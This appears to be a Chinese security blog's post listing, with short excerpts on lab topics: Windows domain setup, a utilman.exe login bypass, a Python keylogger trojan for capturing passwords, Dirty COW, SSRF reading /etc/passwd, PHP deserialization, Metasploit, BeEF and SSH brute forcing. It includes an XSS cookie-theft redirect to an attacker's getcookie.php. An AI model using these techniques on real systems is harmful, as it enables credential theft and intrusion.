- 博客(19)
- 收藏
- 关注
RSS订阅原创 虚拟机windows server创建域
3、输入域管理员账号密码,也就是windows server域控制器的管理员用户密码(这里输入上面创建的zhangsan用户密码也可以,因为他也是域内的成员)。2、因为组策略生效需要刷新策略,重启后还使用域用户zhangsan登录,再次按下 alt+ctrl+del,发现此时已经没有任务管理器选项,组策略已经生效。5、然后我们这里不使用自己的用户登录,刚刚我们在域控服务器里面创建了一个zhangsan的用户,我们使用域用户zhangsan登录。2.选择添加新林,输入根域名lbtz.com,自己随便起一个。
2024-08-01 17:07:48
953
原创 虚拟机win server安装配置DNS服务器
创建DNS服务器前将自己的网卡地址设置为静态IP,选择自己的网卡。因为本机作为DNS服务器所以将DNS服务器地址设为了自己的回环地址。
2024-08-01 11:14:45
298
原创 虚拟机Windows server忘记密码解决方法
原理原理utilman.exe是Windows辅助工具管理器程序,虽然它本身不是一个关键的系统进程,但通过修改这个文件,用户可以访问一些有用的UI设置。在某些情况下,比如忘记密码需要重置时,通过修改utilman.exe文件为cmd.exe(命令提示符程序),可以绕过登录屏幕直接进入命令行界面,从而进行密码重置或其他系统管理任务。这种技术通常被称为”利用utilman.exe进行密码重置“。。
2024-08-01 08:50:15
518
原创 Python木马程序键盘监控
一、环境需求安装键盘记录木马:记录win7中键盘按下信息,数据传送给控制端,可以看到对方输入的信息。例如QQ密码或银行密码。此程序对环境需求较严格,只建议自己在虚拟机里简单玩玩。一、环境需求安装控制端:1、windows系统或linux系统如:ubuntu、kali2、能够运行python被控端:被控端建议在虚拟机里,我这里是在虚拟机中一个全新的win7系统配置下面的环境。用到的python和exe版的库文件在我资源里可以免费下载。1、虚拟机中windows7系统。
2024-06-18 21:30:11
786
原创 Linux(CVE-2016-5195)Dirty cow漏洞利用提权
1、虚拟机 环境2、下载后解压 ,虚拟机打开二、信息收集1、查看kali本机IP<192.168.209.152>,进行本网段扫描2、扫描到有一个IP<192.168.209.154>,这个就是同网段靶机的IP。3、 扫描端口,发现开放了三个端口4、访问1898端口,本机或kali访问都可以。
2024-06-04 22:27:28
540
1
原创 全新kali搭建pwn环境(超详细截图)
可能会用到的命令:删除目录rm -rf 目录名下面所有安装操作最好都在root用户同一目录(~)下cd ~安装报这个错误是自己网络问题,我连的校园网后来换热点就好了。kali源和pip源不一样两个都最好换源,不换可能会报错,换了下载速度也快。
2024-05-24 18:40:24
1289
原创 php://filter过滤器学习
一、字符串过滤器一、字符串过滤器以string开头对数据进行字符串对于的处理常见的有rot13touppertolower等。rot13(回转13)原理上来说是对26个小写字母以及26个大写字母进行操作,对原有字母的ASCII值 + 13或者ASCII-13,然后找到计算后的ASCII值对应的字母。通过这样的规则将一个字母替换为另一个字母,从而达到加密的目的。strip_tags是对数据流进行strip_tags函数的处理,该函数功能为剥去字符串中的HTMLXML以及PHP的标签,简单理解就是。
2024-04-11 10:22:15
898
原创 SSRF漏洞简单学习
SSRF(服务器请求伪造)是一种由攻击者形成服务器端发起的安全漏洞,本质属于信息泄露漏洞。file://从文件系统中获取文件内容,如file:///etc/passwd。当我们发现有ssrf漏洞服务器或主机后可以利用一些伪协议访问内网的主机。形成的原因:大部分是由于服务器端提供了从其他服务器应用。sftp:// SSH文件传输协议或安全文件传输协议。gopher://分布式文档传递服务。攻击的目标是:在外网内无法访问的。ldap://轻量级目录访问协议。tftp://简单文件传输协议。
2024-04-06 20:54:52
130
1
原创 PHP伪协议学习
主要学习file://、php://input、php://filter、data://、zip://, bzip2://, zlib://几个伪协议。要成功应用伪协议需要php.ini文件的allow_url_fopen默认开启 (on)allow_url_include默认关闭(off)
2024-04-06 15:27:46
649
1
原创 PHP魔术方法
在对象生命周期结束之前执行一些必要的清理操作,如释放资源、关闭数据库连接、保存对象状态等。自定义对象在被调试时的输出,可以控制对象在使用 var_dump() 函数时打印的信息。在对象创建之后对其进行初始化操作,如初始化属性、建立与数据库的连接、加载必要的资源等。时提供一个统一的处理逻辑使其不会导致错误。时提供一个统一的处理逻辑使其不会导致错误。时提供一个统一的处理逻辑使其不会导致错误。时提供一个统一的处理逻辑使其不会导致错误。在对象被克隆时提供一个修改克隆副本的机会。一个对象的不存在或不可访问的。
2024-03-31 15:19:41
747
原创 PHP序列化和反序列化
序列化序列化序列化是指将数据结构或对象转换为一串字节流的过程。使其可以在存储、传输或缓存时进行持久化。反序列化反序列化是指将序列化后的数据进行解码和还原,恢复为原始的数据结构或对象的过程。反序列化是序列化的逆过程。在 PHP 中,使用函数可以将数据结构或对象进行序列化,得到一个表示序列化后数据的字符串。通过函数可以将这个字符串进行反序列化,将其还原为原始的数据。序列化格式O:长度:“类名”:变量数:{变量类型:变量名长度:“变量名字”;变量的值;
2024-03-31 09:52:36
742
原创 MSF利用
漏洞检测程序,只检测漏洞是否存在:漏洞利用程序,真正发起攻击的行为,kali中集成了很多EXP,代码文件目录:/usr/share/metasploit-framework/modules/exploits:攻击主机主动去连接被攻击主机,比如我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,防火墙对进入主机某些端口的数据限制是很严的,一般防火墙都是进口的数据限制严格,出口的数据限制相对没有那么严格。
2024-03-24 23:03:21
1039
原创 beef-xss
使用:打开管理界面后将放到有xss漏洞的地方,在管理界面可以控制对方浏览器。为同一局域网内本机IP,不同网段可为服务器IP,当然相关操作也要在服务器上进行。首次启动要输入设置密码,此密码为管理界面的密码。kali工具在root用户下先更新避免安装失败。
2024-03-23 16:25:02
150
原创 XSS攻击
准备工作可以写一个PHP文件(getcookie.php)把传来的cookie写入到一个文件中。写一个恶意链接:document.location="http://"/xss/getcookie.php?跳转到攻击者服务器地址访问xss目录下的getcookie.php文件并传入参数为当前页面的cookie值。把恶意链接写入到有xss漏洞的网站中。
2024-03-23 15:32:06
226
原创 SSH模拟爆破
SSH协议(Secure Shell,安全外壳协议)是一种需要进行加密和认证的,用于远程访问及文件传输的网络安全协议(加密的网络传输协议)。SSH功能类似于Telnet服务,但SSH基于加密和认证的特性可以为用户提供更强大的安全保障机制,在用户使用不安全的网络环境登录设备时,SSH能够有效保护设备不受IP地址欺诈、明文密码截取等攻击。
2024-03-23 14:43:28
231
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人